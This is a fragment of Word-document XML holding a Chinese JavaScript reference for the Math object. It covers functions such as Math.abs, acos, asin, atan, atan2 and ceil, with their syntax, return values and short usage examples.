    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.cos()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算余弦值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.exp()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>计算</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的乘方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.floor()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对一个数字向下取整。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.log()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算自然对数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.max()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回两个数中较大的那个。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.min()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回两个数中较小的那个。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.pow()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5Text"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.random()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算一个随机数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.round()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>四舍五入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Math.sin()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算正弦值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.sqrt()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算平方根。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.tan()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算正切值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math</w:t>
      </w:r>
      <w:r>
        <w:t>是一个对象，其属性为若干有用的函数和常量。这些函数和常量的引用语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y=Math.sin(x);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>area=radius*radius*Math.PI;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>不同，</w:t>
      </w:r>
      <w:r>
        <w:t>Math</w:t>
      </w:r>
      <w:r>
        <w:t>不是对象的类。没有</w:t>
      </w:r>
      <w:r>
        <w:t>Math()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，类似于</w:t>
      </w:r>
      <w:r>
        <w:t>Math.sin()</w:t>
      </w:r>
      <w:r>
        <w:t>这样的函数只是简单的函数，而不是对某个对象进行操作的方法。</w:t>
      </w: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Number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="681" w:name="Math_abs__"/>
      <w:r>
        <w:t>Math.abs()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="681"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算绝对值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.abs(x)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任</w:t>
      </w:r>
      <w:r>
        <w:t>意数值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的绝对值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="682" w:name="Math_acos__"/>
      <w:r>
        <w:t>Math.acos()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="682"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算反余弦值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.acos(x)</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x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>-1.0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定值</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的反余弦值。返回值将介于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>π</w:t>
      </w:r>
      <w:r>
        <w:t>弧度之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="683" w:name="Math_asin__"/>
      <w:r>
        <w:t>Math.asin()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="683"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算反正弦值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.asin(x)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-1.0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定值</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的反正弦值。返回值将介于</w:t>
      </w:r>
      <w:r>
        <w:t>-π/2</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>π/2</w:t>
      </w:r>
      <w:r>
        <w:t>弧度之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="684" w:name="Math_atan__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Math.atan()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="684"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算反正切值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.atan(x)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任意数值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定值</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的反正切值。返回值将介于</w:t>
      </w:r>
      <w:r>
        <w:t>-π/2</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>π/2</w:t>
      </w:r>
      <w:r>
        <w:t>弧度之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="685" w:name="Math_atan2__"/>
      <w:r>
        <w:t>Math.atan2()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="685"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算从</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴到指定点的角度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.atan2(y,x)</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y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定点的</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定点的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴正半轴与指定点</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>之间沿逆时针方向的夹角，值介于</w:t>
      </w:r>
      <w:r>
        <w:t>-π</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>π</w:t>
      </w:r>
      <w:r>
        <w:t>弧度之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.atan2()</w:t>
      </w:r>
      <w:r>
        <w:t>函数计算</w:t>
      </w:r>
      <w:r>
        <w:t>y/x</w:t>
      </w:r>
      <w:r>
        <w:t>的反正切值。可以将参数</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>看做一个点的</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标，将参数</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>看做该点的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标。注意本函数中参数的顺序：</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标在</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标前面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="686" w:name="Math_ceil__"/>
      <w:r>
        <w:t>Math.ceil()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="686"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对一个数字向上取整</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.ceil(x)</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x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>任意数值或表达式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大于或等于</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的最接近的整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.ceil()</w:t>
      </w:r>
      <w:r>
        <w:t>执行向上取整运算，也就是说，它返回大于或等于函数参数的最接近的整数。</w:t>
      </w:r>
      <w:r>
        <w:t>Math.ceil()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Math.round()</w:t>
      </w:r>
      <w:r>
        <w:t>不同，前者总是向上取整，后者则是向上或向下取整到最接近的整数。也要注意，</w:t>
      </w:r>
      <w:r>
        <w:t>Math.ceil()</w:t>
      </w:r>
      <w:r>
        <w:t>不会将负数变成绝对值更大的负数，而是将它们向</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的方向取整。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=Math.ceil(1.99);//</w:t>
      </w:r>
      <w:r>
        <w:t>结果为</w:t>
      </w:r>
      <w:r>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>b=Math.ceil(1.01);//</w:t>
      </w:r>
      <w:r>
        <w:t>结果为</w:t>
      </w:r>
      <w:r>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c=Ma</w:t>
      </w:r>
      <w:r>
        <w:t>th.ceil(1.0);//</w:t>
      </w:r>
      <w:r>
        <w:t>结果为</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>d=Math.ceil(-1.99);//</w:t>
      </w:r>
      <w:r>
        <w:t>结果为</w:t>
      </w:r>
      <w:r>
        <w:t>-1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
